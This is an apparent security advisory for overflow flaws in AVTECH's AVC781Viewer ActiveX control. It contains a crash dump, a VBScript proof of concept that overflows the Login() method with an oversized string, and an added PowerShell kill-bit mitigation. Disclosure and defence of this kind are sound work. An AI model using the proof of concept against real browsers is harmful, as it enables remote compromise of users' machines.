Vendor: AVTECH Software, Inc.
Product Web Page: http://www.avtech.com
Summary: AVTECH Software, a private corporation founded in 1988, is a computer software and
hardware manufacturer specializing in providing Windows NT/2K/XP/2K3 products to monitor
multi-OS computers and network issues throughout a department or an entire enterprise.
Once issues or events occur, AVTECH Software products use today’s most advanced alerting
technologies to communicate critical and important status information to remote system
managers and IT professionals via mobile phones, pagers, PDAs, email, the web and more.
Automatic corrective actions can also be taken to immediately resolve issues, run scripts,
and shutdown/restart servers or applications.
AVTECH Software is now the premier worldwide manufacturer of environment monitoring equipment
specifically designed to monitor today’s advanced computer rooms and data centers. Our Room Alert
and TemPageR products are used to monitor environmental conditions in many of the world’s most
secure data centers and are installed in almost every branch of the US government.
Description: AVTECH Software’s AVC781Viewer ActiveX Control suffers from multiple remote vulnerabilities
such as buffer overflow, integer overflow and denial of service (IE crash). This issue is
triggered when an attacker convinces a victim user to visit a malicious website.
Remote attackers may exploit this issue to execute arbitrary machine code in the context of
the affected application, facilitating the remote compromise of affected computers. Failed
exploit attempts likely result in browser crashes.
-----------------------------------------------
Exception Code: ACCESS_VIOLATION
Disasm: 10006C23 MOV [EAX],CL (AVC_AX_724_VIEWER.dll)
Seh Chain:
--------------------------------------------------
1 10022F68 AVC_AX_724_VIEWER.dll
2 FC2950 VBSCRIPT.dll
3 7C839AC0 KERNEL32.dll
Called From Returns To
--------------------------------------------------
AVC_AX_724_VIEWER.10006C23 AVC_AX_724_VIEWER.10044508
AVC_AX_724_VIEWER.10044508 AVC_AX_724_VIEWER.100097B0
AVC_AX_724_VIEWER.100097B0 8244C8B
Registers:
--------------------------------------------------
EIP 10006C23
EAX BAADF06D
EBX 00180724 -> Uni: defaultV
ECX 0013EE41 -> 24001827 -> Uni: '$'$
EDX 00182801 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDI 001827BC -> Uni: defaultV
ESI 00180724 -> Uni: defaultV
EBP 00FE4658 -> 10044530 -> Asc: 0E0E
ESP 0013EE40 -> 001827BC
Block Disassembly:
--------------------------------------------------
10006C12 MOV EAX,[EBP+144]
10006C18 ADD EAX,60
10006C1B JMP SHORT 10006C20
10006C1D LEA ECX,[ECX]
10006C20 MOV CL,[EDX]
10006C22 INC EDX
10006C23 MOV [EAX],CL <-- CRASH
10006C25 INC EAX
10006C26 TEST CL,CL
10006C28 JNZ SHORT 10006C20
10006C2A MOV EAX,[ESP+20]
10006C2E ADD EAX,-10
10006C31 LEA ECX,[EAX+C]
10006C34 OR EDX,FFFFFFFF
10006C37 LOCK XADD [ECX],EDX
ArgDump:
--------------------------------------------------
EBP+8 00FE4658 -> 10044530 -> Asc: 0E0E
EBP+12 001862FC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 0018AB44 -> Uni: defaultV
EBP+20 00180A54 -> Uni: defaultV
EBP+24 00000001
EBP+28 00000001
Stack Dump:
--------------------------------------------------
13EE40 BC 27 18 00 24 07 18 00 F4 EE 13 00 74 1F 18 00 [............t...]
13EE50 AC F1 13 00 68 2F 02 10 FF FF FF FF B7 9B 00 10 [....h...........]
13EE60 00 28 18 00 74 1F 18 00 BC 27 18 00 24 07 18 00 [....t...........]
13EE70 5C 07 18 00 F4 EE 13 00 00 00 00 00 D8 DD 47 00 [\.............G.]
13EE80 58 46 FE 00 08 00 00 00 08 00 13 00 44 4A 12 77 [XF..........DJ.w]
=============================================
=============================================
Proof Of Concept:
###############################
<object classid='clsid:8214B72E-B0CD-466E-A44D-1D54D926038D' id='kungfuhustle' />
<script language='vbscript'>
' Method metadata for the vulnerable Login() member (informational; not referenced by the script)
targetFile = "C:\WINDOWS\system32\AVC_AX_724_VIEWER.dll"
prototype = "Sub Login ( ByVal Username As String, ByVal Password As String, ByVal MediaType As String, ByVal ConnectType As String )"
memberName = "Login"
progid = "AVC781Viewer.CV781Object"
argCount = 4
' Oversized first argument (1010 bytes) overruns the buffer Login() copies it into; see the crash dump above
arg1 = String(1010, "A")
arg2 = "defaultV"
arg3 = "defaultV"
arg4 = "defaultV"
kungfuhustle.Login arg1, arg2, arg3, arg4
</script>
More info: http://www.zeroscience.mk/mk/vulnerabilities/ZSL-2010-4934.php
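The advisory lists no vendor fix. The usual host-side mitigation for a vulnerable ActiveX control is to set its kill bit so Internet Explorer refuses to instantiate the CLSID, whatever page tries to load it. The PowerShell below is an added example, not code from the advisory or the vendor; the CLSID is the one the PoC instantiates, the registry paths are the standard IE "ActiveX Compatibility" keys, and the function names are the editor's own. Run it from an elevated prompt.

```powershell
# Added example (not part of the advisory): set the IE kill bit for the AVC781Viewer control.
$clsid = '{8214B72E-B0CD-466E-A44D-1D54D926038D}'   # CLSID from the PoC above
$KillBit = 0x400                                      # "Compatibility Flags" kill-bit value

# Both registry views: native, and Wow6432Node for 32-bit IE on 64-bit Windows
$baseKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility'
)

function Set-ActiveXKillBit {
    param([string]$Clsid, [string[]]$BaseKeys)
    foreach ($base in $BaseKeys) {
        if (-not (Test-Path $base)) { continue }          # this view does not exist on this host
        $key = Join-Path $base $Clsid
        if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
        $current = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                    -ErrorAction SilentlyContinue).'Compatibility Flags'
        # OR the kill bit in so any other compatibility flags already set are preserved
        $new = [int]$current -bor $KillBit
        Set-ItemProperty -Path $key -Name 'Compatibility Flags' -Value $new -Type DWord
    }
}

function Test-ActiveXKillBit {
    param([string]$Clsid, [string[]]$BaseKeys)
    foreach ($base in $BaseKeys) {
        if (-not (Test-Path $base)) { continue }
        $key = Join-Path $base $Clsid
        $flags = (Get-ItemProperty -Path $key -Name 'Compatibility Flags' `
                  -ErrorAction SilentlyContinue).'Compatibility Flags'
        [pscustomobject]@{
            Key        = $key
            Flags      = ('0x{0:X8}' -f [int]$flags)
            KillBitSet = (([int]$flags -band $KillBit) -ne 0)
        }
    }
}

Set-ActiveXKillBit  -Clsid $clsid -BaseKeys $baseKeys
Test-ActiveXKillBit -Clsid $clsid -BaseKeys $baseKeys | Format-Table -AutoSize
```

After the kill bit is set, the PoC's `<object>` tag yields no control and the `kungfuhustle.Login` call fails instead of reaching the vulnerable copy loop; the same key is also what a GPO or SCCM baseline would push fleet-wide.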